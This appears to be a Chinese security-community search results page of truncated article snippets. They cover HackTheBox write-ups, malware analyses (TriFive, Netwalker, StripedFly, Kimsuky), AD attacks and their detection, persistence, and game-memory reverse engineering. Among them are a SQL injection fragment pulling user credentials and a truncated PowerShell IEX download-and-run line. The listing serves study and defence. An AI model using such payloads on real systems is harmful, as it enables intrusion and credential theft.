首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

HTB: Arkham

ViewState反序列化漏洞让我学到了很多,虽然其中数据是加密,但是它提供了一个用于执行攻击密钥使得我能够成功获取shell,上线后在电子邮件找到了管理员密码,需要绕过UAC限制拿到最后flag...Users 以及 BatShare 共享探索我们发现 Users 只存放了一些默认用户和访客用户文件,而 BatShare 包含了一个压缩包appserver.zip同时将其下载下来 lucks...,它会帮助服务器序列化一个 Java 对象,并将其作为网页隐藏字段发送到客户端,当客户端提交时该序列化对象被发送回服务器,服务器可以使用它来取回状态。...来 ping 主机 5、更新 payload 获取反弹shell 找到之前订阅栏目,使用 BurpSuite 将数据包拦截,具体数据包如下 将 javax.faces.ViewState 参数第一个字符...arkham.xml 用于在 windows 反弹 meterpreter,arkham.rc 用于在 msf 中直接配置监听 使用 msfconsole 加载 rc 文件设置参数 msfconsole

1.7K20

恶意软件分析:xHunt活动又使用了新型后门

TriFive后门使用是一个基于电子邮件信道,这个信道可以使用Exchange Web服务(EWS)在被入侵电子邮件帐号已删除邮件夹创建邮件草稿。...TriFive通过登录合法用户收件箱并从“已删除邮件”文件夹电子邮件草稿获取PowerShell脚本,从而提供了对Exchange服务器持久化后门访问。...事实上,基于电子邮件C2也在Hisoka工具中使用过,虽然Hisoka工具使用电子邮件草稿发送和接收数据,但这些草稿仍保留在草稿文件夹,而TriFive后门则专门将其电子邮件草稿保存到“已删除邮件”...,检查“已删除邮件”文件夹主题为555电子邮件。...脚本将打开电子邮件草稿,使用Base64解码电子邮件消息正文中内容,然后通过从每个字符减去10来解密解码命令内容。

2.2K10
您找到你想要的搜索结果了吗?
是的
没有找到

隐匿攻击方法

/lukebaggett/dnscat2-powershell 3、Gmail Gmail 为用户和企业提供电子邮件功能,这意味着大多数组织中都允许向 Gmail 服务器发送流量 可以使用 Gmail...作为命令和控制服务器:定期向 Gmail 收件箱发送信标,检查是否有任何带有活动 ID 新邮件。...大多数现代 Windows使用 PowerShell,并且通常管理员不会限制普通用户对 PowerShell 控制台访问 工具: PoshC2:https://github.com/nettitude...Web 内容创作操作 HTTP 协议扩展 PROPFIND 方法用于检索存储在 WebDAV 服务器资源属性:包括文件名、内容长度、创建和修改日期等 可以将payload放入PROPFIND...其团队成立至今多次参加国际网络安全竞赛取得良好成绩,积累了丰富竞赛经验。团队现有三十多位正式成员及若干预备人员,下属联合分队数支。

87820

PowerShell-RAT:一款基于Python后门程序

今天给大家介绍是一款名叫Powershell-RATPython后门,它可以利用Gmail邮件附件来目标用户设备中提取数据。...这款RAT可以帮助红队测试人员给任何一台Windows设备安装后门,它不仅可以使用屏幕捕捉功能来跟踪用户活动,而且还可以通过电子邮件附件来将提取出数据发送给攻击者。...注:本工具目前还不会被任何反病毒软件检测到,PowerShell-RAT开发意图是为了进行安全教育给研究人员提供实验工具,请不要将其用于恶意目的,否则后果自负。...选项4:该选项将使用Powershell目标设备上发送电子邮件使用Mail.ps1脚本将提取到数据+屏幕截图以邮件附件形式进行发送。...工具界面 首次运行Powershell-RAT时你将会看到如下图所示选项界面: ? 使用Hail Mary选项可以帮助你在目标Windows设备安装后门: ?

1.6K50

I Am The King恶意软件家族分析

它是通过恶意Word文档鱼叉式网络钓鱼电子邮件传播,目前无法获取其中样本。它通过PowerShell脚本对目标进行渗透,该脚本远程服务器下载隐藏在镜像文件有效负载。...目前确定了两个主要开发分支:一个是发送url编码POST数据,另一个是发送JSON数据,两者同时使用。...此C ++后门还提供与KingOfHearts类似的功能,具有执行Powershell脚本功能。 区别在于截图捕获功能直接嵌入在程序,而不是由单独程序处理。...植入程序在%TEMP%文件夹创建一个自我删除程序,将其自身文件系统删除。 截至2020年,JackOfHearts仍用于部署QueenOfHearts。...恶意文档包含伪装为Word文档LNK文件,单击这些链接将执行Powershell后门,后门会隐藏在自定义Windows事件日志通过HTTPS,DNS,POP3S检索其他脚本。

2.1K60

钓鱼钓鱼是攻击计算机最常用技术

研究人员在分析了数十亿次攻击后警告说,Microsoft Office宏,PowerShell等仍在通过网络钓鱼电子邮件分发攻击网络罪犯很受欢迎。...这些活动许多活动将通过声称需要使用功能来查看Microsoft Word或Microsoft Excel附件,使用社会工程学来鼓励受害者启用宏。...攻击者仍会定期将PowerShell滥用,以将其作为网络钓鱼电子邮件最初立足点,从而获得对网络访问。与涉及宏攻击不同,这些攻击通常依赖于发送受害者以单击带有代码链接来执行PowerShell。...攻击通常很难检测到,因为它们使用是合法Windows功能,这就是PowerShell仍然受到攻击者欢迎原因。...有关最常见攻击技术数据来自针对Proofpoint客户活动以及对数十亿封电子邮件分析。 Proofpoint研究人员在博客文章说:“训练用户发现和报告恶意电子邮件

90020

HTB: Rabbit

通过SQL注入可获取CMS账号密码,登陆OWA发送钓鱼邮件获取权限,绕过Windows Defender依靠Apache服务完成提权。感兴趣同学可以在HackTheBox中进行学习。...//www.exploit-db.com/exploits/41131 首先看看数据基本信息,当前数据库版本为 5.7.19,当前用户为 Dbuser@localhost id=engineer union...where table_name=0x7573657273-- 获取users表字段username和password当中数据 id=engineer union all select 1,username...Kain/doradaybendita 登录OWA查看其中邮件 在邮件可以发现其中部署了 Open Office,但是计算机 Windows Defender 已开启、PowerShell...msf.zip 解压后找到Basic/Standard/目录编辑文件Module1.xml修改payload powershell.exe IEX (New-Object System.Net.Webclient

66720

域渗透:使用蜜罐检测出Kerberoast攻击

防病毒和EDR解决方案在检测和阻止攻击者方面已经走了很长一段路,但是牛批黑客很可能通过各种奇技淫巧技术来规避这些控制措施。 防守方通常会忽略一种方法——使用蜜罐帐户。...蜜罐帐户是一种策略性地定位在网络帐户,在这种情况下使用蜜罐帐户主要目的是检测Kerberoasting(在@ myexploit2600文章),根据我们在行业经验,这是在攻击之后使用最常见攻击媒介之一...这是攻击者在进行Kerberoasting攻击时将看到内容,因此重要是使其看起来像合法东西,例如惰性sys管理员已将其放入Domain Admins组MSSQL服务帐户。...创建一个自定义事件视图,以识别何时为我们蜜罐用户帐户请求Kerberos服务票证。这可以通过使用以下包含我们新创建帐户XPath查询来完成。...在最后一步,我们将操作设置为启动powershell.exe,但是您应该将其更改为启动PowerShell脚本,该脚本通过电子邮件向管理员发送电子邮件,说明正在进行恶意活动也将禁用该帐户。 ?

1K20

朝鲜黑客组织Kimsuky战术披露,曝迄今未记录恶意组件

执行 获得初始访问权限后,Kimsuky使用BabyShark恶意软件和PowerShellWindows Command Shell执行。...其中,BabyShark是基于Visual Basic脚本(VBS)恶意软件,往往通过包含链接或附件电子邮件传递。...特权提升 在特权提升方面,Kimsuky使用是众所周知方法:将脚本放入Startup文件夹,创建和运行新服务,更改默认文件关联以及注入恶意代码。...防御规避 包括禁用安全工具,删除文件以及使用Metasploit等。 凭证访问 Kimsuky使用合法工具和网络嗅探器Web浏览器、文件和键盘记录器收集相关凭证。 ?...除此之外,KGH_SPY后门还可以C2服务器下载辅助负载,通过cmd.exe或PowerShell执行任意命令,甚至可以Web浏览器,Windows凭据管理器,WINSCP和邮件客户端获取凭据。

74330

Windows 逆向】OD 调试器工具 ( CE 工具通过查找访问方式找到子弹数据基地址 | 使用 OD 工具附加游戏进程 | 在 OD 工具查看子弹数据地址 | 推荐 )

文章目录 前言 一、CE 工具通过查找访问方式找到子弹数据基地址 二、使用 OD 工具附加游戏进程 三、在 OD 工具查看 058E2F1C 地址数据 前言 上一篇博客 【Windows 逆向】OD...调试器工具 ( CE 工具通过查找访问方式找到子弹数据基地址 | 使用 OD 工具附加游戏进程 | 在 OD 工具查看 05869544 地址数据 ) , 使用 OD 工具不行 , 干岔劈了..., 本篇博客使用 OD 工具 ; 一、CE 工具通过查找访问方式找到子弹数据基地址 ---- 使用 OD 工具 和 CE 工具 结合 , 挖掘关键数据内存地址 ; 在之前博客 【Windows...逆向】使用 CE 工具挖掘关键数据内存真实地址 ( 查找子弹数据动态地址 | 查找子弹数据静态地址 | 静态地址分析 | 完整流程 ) ★ , 通过查找访问方式 , 找出了子弹数据静态地址...; 这里先使用 CE 查找到子弹数据动态地址 , 然后再到 OD 查找该动态地址对应基地址 ; 先使用 CE 附加该进程 ; 然后打开之前博客 , 分析出数据 ; 此时可以得出 ,

1K20

Netwalker无文件勒索软件分析

恶意软件利用了反射动态链接库(DLL)注入技术,也称reflective DLL加载,可以内存注入DLL,不需要实际DLL文件,也不需要任何Windows加载程序即可注入。...脚本将其解码产生两个DLL,一个是勒索软件x86版本(用于32位OS),另一个是x64版本(用于64位OS)。它会对运行环境进行检测,以便可以确定要使用DLL版本: ?...它首先从kernell32.dll中找到所需功能API地址: ? 然后计算内存地址: ? ? 脚本本身充当DLL加载程序,可以自行计算解析定位其所需内存地址。...然后指定要注入进程,搜索正在运行Windows资源管理器进程。 ? 通过以下代码将勒索软件DLL写入explorer.exe内存空间执行: ? 最后删除副本,防止受害者使用副本恢复文件。...以下是避免被勒索软件攻击一些建议: 定期备份关键数据,减轻勒索软件攻击影响; 安装来自操作系统和第三方供应商最新软件补丁; 遵守良好邮件和网站安全规范; 及时发现警告可疑电子邮件和文件; 在端点上实施应用程序白名单

1.3K20

StripedFly:揭开恶意软件常年隐身秘密

感染过程 第一个检测到shellcode位于WININIT.EXE进程,该进程能够bitbucket[.]org下载二进制文件,执行PowerShell脚本。在最初发现时,感染媒介是未知。...如果没有管理权限,PowerShell脚本加载程序将被放置在HKCU\Software\Microsoft\Windows\CurrentVersion\Applets注册表项,然后使用以下命令将其注册到...在PowerShell可用两种情况下,该恶意软件归档本身主体将被存储在注册表项Software\Microsoft\Windows\CurrentVersion\Shell,由Base64编码,通过上述...一旦凭据收集模块完成其任务,SSH感染程序就会启动,它会过滤SSH密钥和凭据搜索结果,一旦找到,就激活专用线程。该线程随机超时中断时间10分钟到2小时不等,启动渗透进程。...据报道,一名中国台湾网民因无法支付0.345比特币勒索赎金以换取解密内容,决定通过提供支持电子邮件地址与攻击者联系。他在邮件坦率地解释了面临困境,称其月收入只有400美元。

24810

域内横向移动分析及防御

:“New Technology LM Hash”,MD4加密,Windows Vista和Windows Server 2003之后都是用这个 Hash散列可以通过在线数据库、彩虹表等来破解,也可以使用...要想在Windows操作系统抓取散列值或明文密码,必须将权限提升至System (1)抓取 导出SAM文件和system文件,然后通过mimikatz或者Cain来文件读取hash reg save...4、防范 防范措施: Windows Server 2012 R2新增了一个名为受保护用户组(Protected Users),只要将需要保护用户放入该组,攻击者就无法使用mimikatz等工具抓取明文密码和散列值了...、Exchange邮件服务器安全防范 电子邮件可能包含大量源码、企业内部通讯录、明文密码、敏感业务登陆地址及可以外网访问内网V**账号密码等信息 Exchange支持PowerShell对其进行本地或远程操作...其团队成立至今多次参加国际网络安全竞赛取得良好成绩,积累了丰富竞赛经验。团队现有三十多位正式成员及若干预备人员,下属联合分队数支。

1.5K11

Window权限维持(四):快捷方式

查看快捷方式属性将显示目标字段已成功修改以执行PowerShell有效负载。 ? 由于快捷方式存在于启动文件夹,因此暂存器将在下一次Windows登录执行,并且将与命令和控制服务器建立连接。...默认情况下,此模块将使用写字板图标伪装成可信任应用程序。 ? 快捷方式目标字段将使用执行Base64有效负载PowerShell命令填充。可以将快捷方式转移移动到启动文件夹以保持持久性。...当用户进行身份验证时,将执行有效负载,打开Meterpreter会话. ? PoshC2 PoshC2可以创建一个LNK文件并将其直接放置在Windows启动文件夹以保持持久性。...Empire-写字板快捷方式快捷方式目标字段将使用执行Base64有效负载PowerShell命令填充。可以将快捷方式转移移动到启动文件夹以保持持久性。...Meterpreter会话.SharPersist – MeterpreterPoshC2PoshC2可以创建一个LNK文件并将其直接放置在Windows启动文件夹以保持持久性。

1.3K30

【内网渗透】域渗透实战之 cascade

信息收集然后接着继续去通过smb,和获取到密码,获取更多共享文件枚举共享文件看到文件列表find:Meeting_Notes_June_2018.html在 Firefox 查看时就像电子邮件一样...打开与作为参数传递数据 SQLite 连接, LDAP 表读取数据解密密码。我决定通过调试恢复明文密码。图片看到解密密码:WinRM登录继续使用WinRM来获取shell。...接着,我们发现Ldap可以匿名访问,找到了r.thompson@cascade.local信息。通过对其进行base64解密,我们成功拿到了该用户密码。...如何 AD 回收站恢复对象在 Windows Server 2012 之前, AD 回收站还原对象需要使用 LDAP 工具或 PowerShell 列出所有已删除对象,筛选长列表以找到所需对象,...然后,如果您需要恢复已删除对象,您可以“仅”找到删除该对象之前进行备份,使用 NTDSUTIL 挂载快照,使用 LDAP 实用程序连接到已挂载快照,找到该对象,然后将其导出……没关系。

28920

【内网渗透】域渗透实战之 cascade

信息收集 然后接着继续去通过smb,和获取到密码,获取更多共享文件 枚举共享文件 看到文件列表find: Meeting_Notes_June_2018.html在 Firefox 查看时就像电子邮件一样...打开与作为参数传递数据 SQLite 连接, LDAP 表读取数据解密密码。 我决定通过调试恢复明文密码。...接着,我们发现Ldap可以匿名访问,找到了r.thompson@cascade.local信息。通过对其进行base64解密,我们成功拿到了该用户密码。...如何 AD 回收站恢复对象 在 Windows Server 2012 之前, AD 回收站还原对象需要使用 LDAP 工具或 PowerShell 列出所有已删除对象,筛选长列表以找到所需对象...然后,如果您需要恢复已删除对象,您可以“仅”找到删除该对象之前进行备份,使用 NTDSUTIL 挂载快照,使用 LDAP 实用程序连接到已挂载快照,找到该对象,然后将其导出……没关系。

22340

初探伪装在Office宏里反弹Shell

0x1 主要思路 宏病毒是一种寄存在文档或模板计算机病毒。一旦打开这样文档,其中宏就会被执行,于是宏病毒就会被激活,转移到计算机上,驻留在Normal模板上。...我们通过工具生成一个有powershelldownloader功能一个excel,victim服务器打开此excel之后会CC服务器下载执行一个基于powershellpayload到本地计算机后就可以通过...victim端打开此文档后启用宏之后,会执行相关宏代码连接到Metasploit客户端,使用shell命令可以可以获得一个命令行对应windows系统此时应该会拉起一个cmd.exe ? ?...待用户执行了宏代码之后,会调用windows系统的当中wmi拉起powershell进行下载连接远程CC端。 关键代码如下: ? 可以在第一个powershell.exe启动参数找到痕迹 ?...添加到注册表恶意代码如下: ? 通过抓包分析获取到流量数据基本都是是乱码,流量分析起来有一定困难。 ?

1.3K20

Active Directory获取域管理员权限攻击方法

您可能会认为,使用已发布补丁程序阻止管理员将凭据放入组策略首选项,这将不再是问题,尽管在执行客户安全评估时我仍然在 SYSVOL 中找到凭据。...无论站点中是否有修补程序或 2012/2012R2 DC,它都会找到定位易受攻击 DC,并且可以正常工作。...IFM 与 DCPromo 一起使用以“媒体安装”,因此被提升服务器不需要通过网络另一个 DC 复制域数据。...通过对虚拟化主机管理员权限,可以克隆虚拟 DC 离线复制相关数据。 获取对虚拟 DC 存储数据访问权限,并有权访问域凭据。你运行 VMWare 吗?...IFM 与 DCPromo 一起使用以“媒体安装”,因此被提升服务器不需要通过网络另一个 DC 复制域数据

5.1K10

Windows 逆向】OD 调试器工具 ( CE 工具通过查找访问方式找到子弹数据基地址 | 使用 OD 工具附加游戏进程 | 在 OD 工具查看 05869544 地址数据 | 仅做参考 )

文章目录 一、CE 工具通过查找访问方式找到子弹数据基地址 二、使用 OD 工具附加游戏进程 三、在 OD 工具查看 05869544 地址数据 一、CE 工具通过查找访问方式找到子弹数据基地址...---- 使用 OD 工具 和 CE 工具 结合 , 挖掘关键数据内存地址 ; 在之前博客 【Windows 逆向】使用 CE 工具挖掘关键数据内存真实地址 ( 查找子弹数据动态地址 | 查找子弹数据静态地址...| 静态地址分析 | 完整流程 ) ★ , 通过查找访问方式 , 找出了子弹数据静态地址 ; 这里先使用 CE 查找到子弹数据动态地址 , 然后再到 OD 查找该动态地址对应基地址 ;...先使用 CE 附加该进程 ; 然后打开之前博客 , 分析出数据 ; 此时可以得出 , 当前子弹动态地址为 05869544 ; 二、使用 OD 工具附加游戏进程 ---- 尝试使用...运行 按钮 , 否则 游戏进程 会一直卡住 ; 三、在 OD 工具查看 05869544 地址数据 ---- 在 OD 工具 Command 命令框 , 输入 dd 05869544

1.2K10
领券